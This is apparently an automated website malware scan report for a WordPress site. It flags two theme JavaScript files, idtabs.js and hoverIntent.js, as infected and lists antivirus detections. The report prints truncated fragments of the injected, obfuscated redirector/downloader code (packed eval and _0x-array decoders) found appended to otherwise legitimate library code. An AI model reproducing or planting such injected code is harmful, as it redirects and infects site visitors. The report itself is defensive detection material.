New scan:

Malware Scanner report for new.plumdragoness.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "new.plumdragoness.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=new.plumdragoness.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://new.plumdragoness.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://new.plumdragoness.com/
200 OK
Content-Length: 53667
Content-Type: text/html
clean
http://new.plumdragoness.com/wp-content/themes/Cion/js/jquery.js
200 OK
Content-Length: 56281
Content-Type: application/javascript
clean
http://new.plumdragoness.com/wp-content/themes/Cion/js/idtabs.js
200 OK
Content-Length: 3498
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(7($){$.F.q=7(){4 s={"b":B,"3":L,"5":B};o(4 i=0;i<t.8;++i){4 n={},a=t[i];M(m a){f"I":$.w(n,a);l;f"v":f"u":n.b=a;l;f"C":n["3"]=a;l;f"7":n.5=a;l};$.w(s,n)}4 j=2;
... 2494 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
McAfee-GW-Edition
JS/Redirector
DrWeb
JS.DownLoader.216
Kaspersky
Trojan-Downloader.JS.Agent.gnk
Microsoft
Trojan:JS/Redirector.IM
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
PCTools
Malware.JS-Alescurf
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
eSafe
JS.Agent.gnk
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Norman
Agent.ACM
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://new.plumdragoness.com/wp-content/themes/Cion/js/slider.js
200 OK
Content-Length: 2894
Content-Type: application/javascript
clean
http://new.plumdragoness.com/wp-content/themes/Cion/js/superfish.js
200 OK
Content-Length: 6035
Content-Type: application/javascript
clean
http://new.plumdragoness.com/wp-content/themes/Cion/js/hoverIntent.js
200 OK
Content-Length: 5463
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){

$.fn.hoverIntent = function(f,g) {
var cfg = {
sensitivity: 7,
interval: 100,
timeout: 0
};
cfg = $.extend(cfg, g ? { over: f, out: g } : f );

var cX, cY, pX, pY;

var track = function(ev) {
cX = ev.pageX;
cY = ev.pageY;
};

var compare = function(ev,ob) {
ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
if ( ( Math.abs(pX-cX) + Ma
... 3218 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
McAfee-GW-Edition
JS/Redirector
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Norman
Agent.ACM
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
BitDefender
Trojan.JS.Agent.EXP

http://new.plumdragoness.com/?page_id=5
200 OK
Content-Length: 17872
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=221
200 OK
Content-Length: 12850
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=219
200 OK
Content-Length: 14297
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=220
200 OK
Content-Length: 14373
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=160
200 OK
Content-Length: 20079
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=7
200 OK
Content-Length: 15231
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=258
200 OK
Content-Length: 15935
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=226
200 OK
Content-Length: 25722
Content-Type: text/html
clean
http://new.plumdragoness.com/?page_id=213
200 OK
Content-Length: 20015
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: new.plumdragoness.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 14 Jun 2014 08:10:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 53667
Content-Type: text/html; charset=UTF-8
X-Pingback: http://new.plumdragoness.com/xmlrpc.php

...53667 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: new.plumdragoness.com
Referer: http://www.google.com/search?q=new.plumdragoness.com

Result:
The result is similar to the first query. There are no suspicious redirects found.